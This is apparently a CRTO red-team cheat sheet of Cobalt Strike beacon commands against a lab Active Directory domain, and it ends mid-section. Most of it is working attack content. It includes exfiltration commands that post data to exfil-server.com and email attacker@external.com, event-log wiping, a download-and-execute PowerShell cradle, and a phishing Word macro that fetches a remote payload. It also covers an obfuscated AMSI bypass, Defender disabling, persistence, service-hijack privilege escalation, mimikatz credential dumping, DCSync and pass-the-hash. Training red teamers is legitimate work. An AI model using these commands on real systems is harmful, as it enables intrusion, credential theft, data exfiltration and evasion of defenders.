Cobalt Strike Notes

Name : CRTO - Red Teaming Command Cheat Sheet (Cobalt Strike)

Course Link : https://training.zeropointsecurity.co.uk/courses/red-team-ops

Compiled By : **Emanuele Picariello ( x: https://x.com/EmanuelePicari5

YouTube: https://www.youtube.com/watch?v=rjY884Pamig )**

Disclaimer : This cheat sheet has been compiled from multiple sources with the objective of aiding fellow pentesters and red teamers in their learning. The credit for all the tools and techniques belongs to their original authors.

Modified By: Shiro

CRTO - Red Teaming Command Cheat Sheet (Cobalt Strike)

Name : CRTO - Red Teaming Command Cheat Sheet (Cobalt Strike)

Course Link : https://training.zeropointsecurity.co.uk/courses/red-team-ops

Compiled By : **Emanuele Picariello ( x: https://x.com/EmanuelePicari5

YouTube: https://www.youtube.com/watch?v=rjY884Pamig )**

Disclaimer : This cheat sheet has been compiled from multiple sources with the objective of aiding fellow pentesters and red teamers in their learning. The credit for all the tools and techniques belongs to their original authors.

Modified By: Shiro

---

Data Exfiltration

Network Share Enumeration

Usage: Discover and access network file shares containing sensitive data.

# General share discovery
beacon> powerpick Invoke-ShareFinder
beacon> powerpick Invoke-FileFinder
beacon> powerpick Get-FileNetServer

# Search for Group Policy passwords in SYSVOL
beacon> shell findstr /S /I cpassword \\dc.organicsecurity.local\sysvol\organicsecurity.local\policies\*.xml
beacon> Get-DecryptedCpassword

# Find accessible shares with sensitive files
beacon> powerpick Find-DomainShare -CheckShareAccess
beacon> powerpick Find-InterestingDomainShareFile -Include *.doc*, *.xls*, *.csv, *.ppt*

# Preview file contents
beacon> powerpick gc \\fs.dev.cyberbotic.io\finance$\export.csv | select -first 5

Database Data Discovery

Usage: Search for sensitive information in accessible databases.

# Search for sensitive keywords in accessible databases
beacon> powerpick Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "email,address,credit,card" -SampleSize 5 | select instance, database, column, sample | ft -autosize

# Database link enumeration and data extraction
beacon> powerpick Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select * from information_schema.tables')"

beacon> powerpick Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select column_name from master.information_schema.columns where table_name=''employees''')"

beacon> powerpick Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select top 5 first_name,gender,sort_code from master.dbo.employees')"

File System Search Techniques

Usage: Search for sensitive files across the network.

# Search for specific file types
beacon> powerpick Get-ChildItem -Path "\\server\share" -Recurse -Include *.xlsx,*.docx,*.pdf | select FullName,Length,LastWriteTime

# Search file contents for keywords
beacon> powerpick Select-String -Path "\\server\share\*.txt" -Pattern "password|credential|secret" | select Filename,LineNumber,Line

# Search registry for stored credentials
beacon> powerpick Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | select DefaultUserName,DefaultPassword

Data Staging and Compression

Usage: Prepare data for exfiltration while minimizing detection.

# Create staging directory
beacon> mkdir C:\Windows\Temp\Updates

# Compress data for exfiltration
beacon> powerpick Compress-Archive -Path "\\server\share\sensitive_folder" -DestinationPath "C:\Windows\Temp\Updates\data.zip"

# Alternative compression using built-in tools
beacon> shell compact /c /s:"C:\Windows\Temp\Updates" /i "\\server\share\*"

# Base64 encode small files for easy transfer
beacon> powerpick [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\sensitive\file.txt")) | Out-File "C:\Windows\Temp\encoded.txt"

Exfiltration Methods

Usage: Transfer data out of the network using various techniques.

# HTTP POST exfiltration
beacon> powerpick Invoke-WebRequest -Uri "http://exfil-server.com/upload" -Method POST -InFile "C:\Windows\Temp\Updates\data.zip"

# DNS exfiltration (for small amounts of data)
beacon> powerpick $data = [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\small_file.txt")); nslookup "$data.exfil.domain.com"

# Email exfiltration
beacon> powerpick Send-MailMessage -From "user@company.com" -To "attacker@external.com" -Subject "Report" -Attachments "C:\Windows\Temp\Updates\data.zip" -SmtpServer "mail.company.com"

# Cloud storage upload (if tools available)
beacon> powerpick Start-Process -FilePath "C:\Program Files\CloudSync\sync.exe" -ArgumentList "--upload C:\Windows\Temp\Updates\data.zip" -WindowStyle Hidden

Covering Tracks

Usage: Remove evidence of data access and exfiltration.

# Clear PowerShell history
beacon> powerpick Remove-Item (Get-PSReadlineOption).HistorySavePath -Force

# Clear Windows event logs
beacon> powerpick wevtutil cl System
beacon> powerpick wevtutil cl Security
beacon> powerpick wevtutil cl Application

# Remove staging files
beacon> shell sdelete -p 3 -s -z C:\Windows\Temp\Updates
beacon> rmdir C:\Windows\Temp\Updates

# Clear file access timestamps (if timestomp available)
beacon> timestomp "\\server\share\accessed_file.xlsx" "01/01/2020 00:00:00"

# Clear browser history and cache
beacon> powerpick Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Force -Recurse
beacon> powerpick Remove-Item -Path "$env:APPDATA\Microsoft\Windows\Recent\*" -Force

---

Additional Tips and Best Practices

Operational Security (OPSEC)

Key considerations for maintaining stealth during operations:

1. Process Selection: Always use legitimate processes for spawning beacons
2. Sleep and Jitter: Configure appropriate sleep intervals with jitter to blend in
3. Communication Profiles: Use realistic HTTP headers and URIs in C2 profiles
4. Artifact Staging: Place files in expected locations (temp directories, system folders)
5. Time-based Operations: Operate during business hours to blend with normal activity

Common Pitfalls

Avoid these common mistakes:

1. Using Default Profiles: Always customize C2 profiles for the target environment
2. Excessive Network Noise: Limit unnecessary network connections and scans
3. Poor Credential Hygiene: Rotate and limit credential usage across systems
4. Ignoring EDR: Test payloads against target EDR solutions before deployment
5. Inadequate Cleanup: Always remove artifacts and close unnecessary sessions

Emergency Procedures

Incident response and cleanup procedures:

# Emergency beacon cleanup
beacon> jobs                    # List active jobs
beacon> jobkill <job_id>       # Kill specific jobs
beacon> exit                   # Cleanly exit beacon

# Remove persistence mechanisms
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -n "Updater" -m remove
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -n "legit-svc" -m remove

# Clear artifacts
beacon> shell del /f /q C:\Windows\Temp\*.exe
beacon> shell del /f /q C:\ProgramData\*.exe
beacon> powerpick Remove-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\Updater" -Force

Useful One-Liners

Quick commands for common tasks:

# Quick domain admin check
beacon> powerpick Get-DomainGroupMember "Domain Admins" | select MemberName

# Find computers with admin access
beacon> powerpick Get-DomainComputer | ? { Invoke-CheckLocalAdminAccess -ComputerName $_.dnshostname }

# Quick kerberoasting
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /nowrap

# Simple DCSync
beacon> dcsync <domain> <user>

# Fast LAPS password extraction
beacon> powerpick Get-DomainComputer -Properties ms-Mcs-AdmPwd | ? { $_."ms-Mcs-AdmPwd" -ne $null }

---

Troubleshooting

Common Issues and Solutions

Beacon Connection Issues

# Check network connectivity
beacon> shell ping <teamserver_ip>
beacon> shell telnet <teamserver_ip> <port>

# Verify listener configuration
# Check firewall rules on teamserver
# Validate C2 profile syntax

PowerShell Execution Issues

# Check execution policy
beacon> powershell Get-ExecutionPolicy

# Use alternative execution methods
beacon> powerpick <command>              # Unmanaged runspace
beacon> execute-assembly <path> <args>   # .NET assembly execution

Privilege Issues

# Check current privileges
beacon> shell whoami /priv
beacon> shell whoami /groups

# Verify token context
beacon> getuid
beacon> rev2self                        # Return to original token

AV/EDR Detection

# Check running security products
beacon> ps | findstr /i "defender\|symantec\|mcafee\|kaspersky\|crowdstrike\|carbon"

# Use alternative techniques
beacon> shinject <pid> x64 <payload>    # Shellcode injection
beacon> execute-assembly <tool>         # In-memory .NET execution

---

References and Resources

Essential Tools

• Cobalt Strike: Commercial C2 framework
• Rubeus: Kerberos abuse tool
• PowerView: PowerShell AD enumeration
• Mimikatz: Credential dumping and manipulation
• Seatbelt: System enumeration
• SharpUp: Privilege escalation discovery

Useful Links

• Cobalt Strike Documentation
• MITRE ATT&CK Framework
• Zero Point Security Training
• Harmj0y’s Blog
• SpecterOps Blog

Learning Resources

• Books: “Red Team Development and Operations” by Joe Vest
• Courses: CRTO, CRTE, OSEP, GCFA
• Labs: HackTheBox, TryHackMe, VulnHub
• Conferences: DEF CON, BSides, DerbyCon

---

End of Enhanced CRTO Notes

Remember: These techniques should only be used in authorized penetration testing and red team exercises. Always ensure proper authorization and follow responsible disclosure practices. Miscellaneous

Quick Commands

# Run a python3 webserver for hosting payloads
$ python3 -m http.server 80

# Check outbound access to TeamServer
$ iwr -Uri http://nickelviper.com/a

# Firewall management
beacon> powerpick New-NetFirewallRule -DisplayName "Test Rule" -Profile Domain -Direction Inbound -Action Allow -Protocol TCP -LocalPort 8080
beacon> powerpick Remove-NetFirewallRule -DisplayName "Test Rule"

Payload Encoding

Usage: Handle extra quotes in PowerShell payloads by encoding them in Base64.

# PowerShell method
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

# Linux method
$ echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0

# Execute encoded payload
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>

---

Command & Control

DNS Configuration for DNS Beacon

Usage: Configure DNS records to enable DNS-based C2 communication.

# Set DNS records where IP points to TeamServer
@    | A  | 10.10.5.50
ns1  | A  | 10.10.5.50
pics | NS | ns1.nickelviper.com

# Verify DNS configuration (should return 0.0.0.0)
$ dig @ns1.nickelviper.com test.pics.nickelviper.com +short

# Use pics.nickelviper.com as DNS Host and Stager in Listener Configuration

TeamServer Setup

Manual Start

# Start TeamServer with C2 profile
> sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

Service Configuration

Usage: Run TeamServer as a persistent system service.

# Create systemd service file
$ sudo vim /etc/systemd/system/teamserver.service

[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

[Install]
WantedBy=multi-user.target

# Service management
$ sudo systemctl daemon-reload
$ sudo systemctl status teamserver.service
$ sudo systemctl start teamserver.service
$ sudo systemctl enable teamserver.service

Automated Web Delivery Setup

Usage: Automatically host web delivery payloads using agscript in headless mode.

# Create host_payloads.cna script
$ cat host_payloads.cna

# Connected and ready
on ready {
    # Generate payload
    $payload = artifact_payload("http", "powershell", "x64");
    
    # Host payload
    site_host("10.10.5.50", 80, "/a", $payload, "text/plain", "Auto Web Delivery (PowerShell)", false);
}

# Add to systemd service file
ExecStartPost=/bin/sh -c '/usr/bin/sleep 30; /home/attacker/cobaltstrike/agscript 127.0.0.1 50050 headless Passw0rd! host_payloads.cna &'

Custom C2 Profile

Usage: Example malleable C2 profile for better operational security.

set sample_name "Dumbledore";
set sleeptime "5000";
set jitter    "20";
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";
set host_stage "true";

post-ex {
    set amsi_disable "true";
    set spawnto_x86 "%windir%\\syswow64\\dllhost.exe";
    set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";
}

http-get {
    set uri "/cat.gif /image /pixel.gif /logo.gif";
    
    client {
        header "Accept" "text/html,image/avif,image/webp,*/*";
        header "Accept-Language" "en-US,en;q=0.5";
        header "Accept-Encoding" "gzip, deflate";
        header "Referer" "https://www.google.com";
        
        parameter "utm" "ISO-8898-1";
        parameter "utc" "en-US";
        
        metadata{
            base64;
            header "Cookie";
        }
    }
    
    server {
        header "Content-Type" "image/gif";
        header "Server" "Microsoft IIS/10.0";    
        header "X-Powered-By" "ASP.NET";    
        
        output{
            prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
            prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
            prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";
            print;
        }
    }
}

http-post {
    set uri "/submit.aspx /finish.aspx";
    
    client {
        header "Content-Type" "application/octet-stream";
        header "Accept" "text/html,image/avif,image/webp,*/*";
        header "Accept-Language" "en-US,en;q=0.5";
        header "Accept-Encoding" "gzip, deflate";
        header "Referer" "https://www.google.com";
        
        id{
            parameter "id";
        }
        
        output{
            print;
        }
    }
    
    server {
        header "Content-Type" "text/plain";
        header "Server" "Microsoft IIS/10.0";    
        header "X-Powered-By" "ASP.NET";    
        
        output{
            print;
        }
    }
}

http-stager {
    server {
        header "Content-Type" "application/octet-stream";
        header "Server" "Microsoft IIS/10.0";    
        header "X-Powered-By" "ASP.NET";    
    }
}

---

Defender Antivirus

Artifact Kit Compilation

Usage: Compile custom artifact kit to evade AV detection.

# Compile the Artifact kit
$ ./build.sh pipe VirtualAlloc 277492 5 false false /mnt/c/Tools/cobaltstrike/artifacts

# Compile the resource kit
$ ./build.sh /mnt/c/Tools/cobaltstrike/resources

Payload Testing

Usage: Test payloads against Windows Defender before deployment.

# Test executable payload
PS> C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\smb_x64.svc.exe

# Test PowerShell payload against AMSI
PS> C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\http_x64.ps1 -e AMSI

# Load CNA file: Cobalt Strike > Script Manager > Load and select the CNA
# Use Payloads > Windows Stageless Generate All Payloads to replace all payloads in C:\Payloads

C2 Profile Modifications

Usage: Enable AMSI bypass in malleable C2 profile.

# Add to C2 profile above http-get block
post-ex {
    set amsi_disable "true";
}

# Verify the modified C2 profile
$ ./c2lint c2-profiles/normal/webbug.profile

Note: amsi_disable only applies to powerpick, execute-assembly and psinject commands, not the powershell command.

Process Spawning Configuration

Usage: Change default processes for better behavioral detection evasion.

# Change spawn-to processes
beacon> spawnto x64 %windir%\sysnative\dllhost.exe
beacon> spawnto x86 %windir%\syswow64\dllhost.exe

# Change default process for psexec
beacon> ak-settings spawnto_x64 C:\Windows\System32\dllhost.exe
beacon> ak-settings spawnto_x86 C:\Windows\SysWOW64\dllhost.exe

Defender Management

Usage: Disable Windows Defender components from PowerShell (requires admin).

# Check current Defender settings
Get-MPPreference

# Disable Defender components
Set-MPPreference -DisableRealTimeMonitoring $true
Set-MPPreference -DisableIOAVProtection $true
Set-MPPreference -DisableIntrusionPreventionSystem $true

AMSI Bypass

Usage: Bypass AMSI in PowerShell sessions.

# AMSI bypass payload (execute in PowerShell)
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

---

Initial Compromise

OWA Enumeration and Password Spraying

Usage: Identify valid users and conduct password spraying against OWA.

# 1. Identify the mail server
$ dig cyberbotic.io
$ ./dnscan.py -d cyberbotic.io -w subdomains-100.txt

# 2. Identify NETBIOS name
ps> ipmo C:\Tools\MailSniper\MailSniper.ps1
ps> Invoke-DomainHarvestOWA -ExchHostname mail.cyberbotic.io

# 3. Prepare username list from employee names
$ ~/namemash.py names.txt > possible.txt

# 4. Validate usernames
ps> Invoke-UsernameHarvestOWA -ExchHostname mail.cyberbotic.io -Domain cyberbotic.io -UserList .\Desktop\possible.txt -OutFile .\Desktop\valid.txt

# 5. Password spraying
ps> Invoke-PasswordSprayOWA -ExchHostname mail.cyberbotic.io -UserList .\Desktop\valid.txt -Password Summer2022

# 6. Download Global Address List with valid credentials
ps> Get-GlobalAddressList -ExchHostname mail.cyberbotic.io -UserName cyberbotic.io\iyates -Password Summer2022 -OutFile .\Desktop\gal.txt

Malicious Office Macro

Usage: Create a Word document with embedded macro for initial access.

# Step 1: Create basic macro for testing
# Open Word > View > Macros > Create > Name: AutoOpen
Sub AutoOpen()
    Dim Shell As Object
    Set Shell = CreateObject("wscript.shell")
    Shell.Run "notepad"
End Sub

# Step 2: Production macro with web delivery
# Generate payload: Attacks > Scripted Web Delivery (S) > 64-bit PowerShell
Sub AutoOpen()
    Dim Shell As Object
    Set Shell = CreateObject("wscript.shell")
    Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""
End Sub

# Step 3: Save as .doc file for phishing campaign

---

Host Reconnaissance

Process and System Enumeration

Usage: Gather information about the compromised system.

# Identify running processes (AV, EDR, monitoring tools)
beacon> ps

# System enumeration with Seatbelt
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe -group=system

# User activity monitoring
beacon> screenshot
beacon> clipboard
beacon> net logons

# Keylogger operations
beacon> keylogger
beacon> job                # List active jobs
beacon> jobkill 3          # Kill specific job

---

Host Persistence

Payload Encoding for Persistence

Usage: Encode PowerShell payloads to handle special characters in persistence mechanisms.

# Default PowerShell locations
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell

# Payload encoding (same as in Miscellaneous section)
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

# Linux alternative
$ echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0

# Final execution command
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>

Normal User Persistence

Task Scheduler

Usage: Create scheduled task for persistence (user-level).

beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoAC...GEAIgApACkA" -n "Updater" -m add -o hourly

Startup Folder

Usage: Place persistence in user’s startup folder.

beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAo..vAGEAIgApACkA" -f "UserEnvSetup" -m add

Registry Autorun

Usage: Use registry run keys for persistence.

# Upload payload to shared location
beacon> cd C:\ProgramData
beacon> upload C:\Payloads\http_x64.exe
beacon> mv http_x64.exe updater.exe

# Create registry persistence
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add

Privileged System User Persistence

Windows Service

Usage: Create Windows service for system-level persistence.

# Upload service binary
beacon> cd C:\Windows
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe legit-svc.exe

# Create service
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add

WMI Event Persistence

Usage: Use WMI events for persistence.

# Upload payload
beacon> cd C:\Windows
beacon> upload C:\Payloads\dns_x64.exe

# Create WMI event
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

---

Privilege Escalation

Service Enumeration

Usage: Identify potentially vulnerable Windows services.

# Service enumeration methods
beacon> powershell Get-Service | fl
beacon> run wmic service get name, pathname
beacon> run sc query
beacon> run sc qc VulnService2

# Service management
beacon> run sc stop VulnService1
beacon> run sc start VulnService1

# Automated vulnerability discovery
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit

Service Exploitation Techniques

CASE 1: Unquoted Service Path

Usage: Exploit unquoted service paths to execute malicious binaries.

# 1. Identify vulnerable services
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit UnquotedServicePath

# 2. Check directory permissions
beacon> powershell Get-Acl -Path "C:\Program Files\Vulnerable Services" | fl

# 3. Place malicious binary in service path
beacon> cd C:\Program Files\Vulnerable Services
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe Service.exe

# 4. Restart service to trigger execution
beacon> run sc stop VulnService1
beacon> run sc start VulnService1
beacon> connect localhost 4444

CASE 2: Weak Service Permissions

Usage: Modify service configuration to point to malicious binary.

# 1. Identify services with weak permissions
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServices

# 2. Check service ACL
beacon> powershell-import C:\Tools\Get-ServiceAcl.ps1
beacon> powershell Get-ServiceAcl -Name VulnService2 | select -expand Access

# 3. Prepare malicious binary
beacon> mkdir C:\Temp
beacon> cd C:\Temp
beacon> upload C:\Payloads\tcp-local_x64.svc.exe

# 4. Modify service configuration
beacon> run sc config VulnService2 binPath= C:\Temp\tcp-local_x64.svc.exe
beacon> run sc qc VulnService2

# 5. Restart service
beacon> run sc stop VulnService2
beacon> run sc start VulnService2
beacon> connect localhost 4444

CASE 3: Weak Service Binary Permissions

Usage: Overwrite service binary with malicious executable.

# 1. Identify vulnerable service binaries
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServices

# 2. Check binary permissions
beacon> powershell Get-Acl -Path "C:\Program Files\Vulnerable Services\Service 3.exe" | fl

# 3. Prepare and upload replacement binary
PS C:\Payloads> copy "tcp-local_x64.svc.exe" "Service 3.exe"
beacon> run sc stop VulnService3
beacon> cd "C:\Program Files\Vulnerable Services"
beacon> upload C:\Payloads\Service 3.exe

# 4. Start service
beacon> run sc start VulnService3
beacon> connect localhost 4444

UAC Bypass

Usage: Bypass User Account Control to elevate privileges.

# Check current user's group memberships
beacon> run whoami /groups

# UAC bypass using scheduled tasks
beacon> elevate uac-schtasks tcp-local

# Verify new beacon connection
beacon> run netstat -anop tcp
beacon> connect localhost 4444

---

Credential Theft

Special Beacon Command Prefixes

• ! - Run command in elevated context of System User
• @ - Impersonate beacon thread token

Credential Dumping Techniques

Local Credential Dumping

Usage: Extract credentials from local system.

# Dump local SAM database
beacon> mimikatz !lsadump::sam

# Dump logon passwords from LSASS
beacon> mimikatz !sekurlsa::logonpasswords

# Dump Kerberos encryption keys
beacon> mimikatz !sekurlsa::ekeys

# Dump Domain Cached Credentials (cannot be used for lateral movement unless cracked)
beacon> mimikatz !lsadump::cache

Kerberos Ticket Operations

Usage: Extract and manage Kerberos tickets.

# List cached Kerberos tickets
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage

# Dump specific TGT ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x7049f /service:krbtgt

Domain Controller Credential Extraction

Usage: Extract credentials from Domain Controller.

# DCSync attack (requires appropriate privileges)
beacon> make_token DEV\nlamb F3rrari
beacon> dcsync dev.cyberbotic.io DEV\krbtgt

# Local krbtgt extraction on DC
beacon> mimikatz !lsadump::lsa /inject /name:krbtgt

---

Domain Reconnaissance

PowerView Enumeration

Usage: Comprehensive Active Directory enumeration using PowerView.

# Import PowerView
beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1

# Domain information
beacon> powerpick Get-Domain -Domain <>
beacon> powerpick Get-DomainSID
beacon> powerpick Get-DomainController | select Forest, Name, OSVersion | fl
beacon> powerpick Get-ForestDomain -Forest <>
beacon> powerpick Get-DomainPolicyData | select -expand SystemAccess

# User enumeration
beacon> powerpick Get-DomainUser -Identity jking -Properties DisplayName, MemberOf | fl
beacon> powerpick Get-DomainUser | select cn,serviceprincipalname          # Kerberoastable users
beacon> powerpick Get-DomainUser -PreauthNotRequired                       # ASREPRoastable users
beacon> powerpick Get-DomainUser -TrustedToAuth                           # Constrained delegation

# Computer enumeration
beacon> powerpick Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName
beacon> powerpick Get-DomainComputer -Unconstrained | select cn, dnshostname                    # Unconstrained delegation
beacon> powerpick Get-DomainComputer -TrustedToAuth | select cn, msdsallowedtodelegateto       # Constrained delegation

# Organizational Unit enumeration
beacon> powerpick Get-DomainOU -Properties Name | sort -Property Name
beacon> powerpick Get-DomainComputer -SearchBase "OU=Workstations,DC=dev,DC=cyberbotic,DC=io" | select dnsHostName

# Group enumeration
beacon> powerpick Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName
beacon> powerpick Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName
beacon> powerpick Get-DomainGroupMember -Identity "Domain Admins" -Recurse | select MemberDistinguishedName

# Group Policy enumeration
beacon> powerpick Get-DomainGPO -Properties DisplayName | sort -Property DisplayName
beacon> powerpick Get-DomainOU -GPLink "{AD2F58B9-97A0-4DBC-A535-B4ED36D5DD2F}" | select distinguishedName
beacon> powerpick Get-DomainGPOLocalGroup | select GPODisplayName, GroupName
beacon> powerpick Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl

# Trust enumeration
beacon> powerpick Get-DomainTrust

# Access enumeration
beacon> powerpick Find-LocalAdminAccess
beacon> powerpick Invoke-CheckLocalAdminAccess -ComputerName <server_fqdn>
beacon> powerpick Invoke-UserHunter
beacon> powerpick Find-PSRemotingLocalAdminAccess -ComputerName <server_fqdn>
beacon> powerpick Find-WMILocalAdminAccess -ComputerName <server_fqdn>

Alternative Enumeration Tools

SharpView

Usage: .NET version of PowerView for environments where PowerShell is restricted.

beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-Domain

ADSearch

Usage: Lightweight LDAP search tool for Active Directory enumeration.

# Basic searches
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "objectCategory=user"
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=group)(cn=*Admins*))"
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=group)(cn=MS SQL Admins))" --attributes cn,member

# Kerberoastable users
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

# ASREPRoastable users
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname

# Delegation enumeration
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

# Use --json parameter for formatted output

---

User Impersonation

Pass The Hash Attack

Usage: Authenticate using NTLM hash without knowing the plaintext password.

# Check current access
beacon> getuid
beacon> ls \\web.dev.cyberbotic.io\c$

# PTH using Cobalt Strike's built-in method
beacon> pth DEV\jking <ntlm_hash>

# Verify access
beacon> powerpick Find-LocalAdminAccess

# Revert to original token
beacon> rev2self

Pass The Ticket Attack

Usage: Use Kerberos tickets for authentication.

# Method 1: Create sacrificial process and inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123

# Inject ticket into the new logon session
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP

# Method 2: Combined approach (single command)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123 /ticket:doIFuj[...snip...]lDLklP 

# Steal token from sacrificial process
beacon> steal_token 4748

OverPass The Hash

Usage: Request TGT using NTLM or AES hash.

# Basic overpass the hash
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /ntlm:<ntlm_hash> /nowrap

# Better OPSEC using AES256 hash
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:<aes256_hash> /domain:DEV /opsec /nowrap

Token Impersonation & Process Injection

Usage: Leverage existing process tokens for access.

# Steal token from specific process
